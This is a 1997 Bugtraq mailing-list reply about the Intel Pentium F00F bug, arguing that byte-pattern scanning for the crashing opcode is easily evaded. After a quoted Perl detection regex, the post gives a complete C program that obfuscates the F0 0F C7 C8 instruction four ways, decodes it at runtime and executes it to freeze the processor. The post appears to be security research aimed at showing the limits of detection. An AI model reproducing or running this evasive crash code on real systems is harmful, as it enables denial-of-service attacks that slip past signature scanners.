Bugtraq mailing list archives
Re: Intel Pentium Bug
From: kragen () DNACO NET (Kragen \)
Date: Mon, 10 Nov 1997 07:35:16 -0500
On Sun, 9 Nov 1997, Jason Parsons wrote:
Re the F0 0F C7 C8 Pentuim bug:
I just wanted ot repost this from the Linux-security list. Thought it
might be helpful to some here. This was posted to Linux-security by Sam
Trenholme <set () reality samiam org>.
if($data =~ /\xf0\x0f\xc7\xc8/) {
print "$dir/$file contains F0 0F C7 C8\n";
}
Is this intended to keep malicious people from crashing your computer?
It is trivial to defeat this, and it is impossible, in the general case,
to determine whether or not a program can compute f0 0f c7 c8 and execute
it.
Here are some trivial examples of ways to defeat it:
/*
* Demonstrate a trivial way to crash a Pentium, f0 0f c7 c8
*/
#include <string.h>
char incr[] = "\xf1\x10\xc8\xc9";
void
fix_incr (char *s) {
for (; *s; s++) --*s;
}
char backwards[] = "\xc8\xc7\x0f\xf0";
void
reverse_inner(char *begin, char *end) {
while (end > begin) {
char t = *end;
*end = *begin;
*begin = t;
end--;
begin++;
}
}
void
reverse(char *s) {
reverse_inner(s, s+strlen(s)-1);
}
char xored[] = "\xf1\x0e\xc9\xc8";
void
xor_pad (char *s, char pad) {
for (; *s; s++) *s ^= pad;
}
char interleaved[] = { 'X', '\xf0', 'Y', '\x0f', 'Z', '\xc7', 'A', '\xc8',
'\0'};
void
deinterleave (char *s) {
char *t = s + 1;
for (; *t; t++, t++, s++) *s = *t;
}
int
main() {
void (*f)();
fix_incr(incr);
reverse(backwards);
xor_pad(xored, 1);
deinterleave(interleaved);
f = incr; /* or backwards, or xored, or interleaved */
(*f)();
}
Now, none of these are very subtle. I could easily write something that
contained a piece of nonsense text, took the second-to-last bit from each
character, and assembled f1 0e c9 c8 from it. The possibilities are
endless.
A trusted-compiler system seems to be the only possible software
protection against attacks like these.
Kragen
Current thread:
- IP DOS attacks -- Win95 and WinNT, (continued)
- IP DOS attacks -- Win95 and WinNT Paul Leach (Nov 18)
- Updating microcode on the fly Superuser (Nov 12)
- Re: Updating microcode on the fly Jyri Kaljundi (Nov 12)
- solaris 251 & syslogd Michael Helm (Nov 12)
- Re: solaris 251 & syslogd Richard Peters (Nov 12)
- Re: solaris 251 & syslogd Dave Kinchlea (Nov 12)
- CERT Advisory CA-97.25 - REVISED- Code Correction Aleph One (Nov 12)
- Bug In Security Dynamics' FTP server (Version 2.2) sp00n (Nov 12)
- Intel Pentium Bug: BSDI Releases a patch Joe Ilacqua (Nov 11)
- Re: Intel Pentium Bug Jason Parsons (Nov 09)
- Re: Intel Pentium Bug Kragen \ (Nov 10)
- Possible solution: [Fwd: I figured out how to make my Pentium Miguel Angel Rodriguez Jodar (Nov 10)
- Re: Intel Pentium Bug Tim Newsham (Nov 10)
- CERT Advisory CA-97.25 - CGI_metachar Aleph One (Nov 10)
- Re: CERT Advisory CA-97.25 - CGI_metachar Greg Bacon (Nov 11)
- L0pht Advisory: IE4.0 Petri Helenius (Nov 10)
- Cisco IOS password encryption facts John Bashinski (Nov 10)
- Re: Cisco IOS password encryption facts ice9 (Nov 11)
- Re: Cisco IOS password encryption facts J. Sean Connell (Nov 11)
- Re: Cisco IOS password encryption facts Michael Degerman (Nov 13)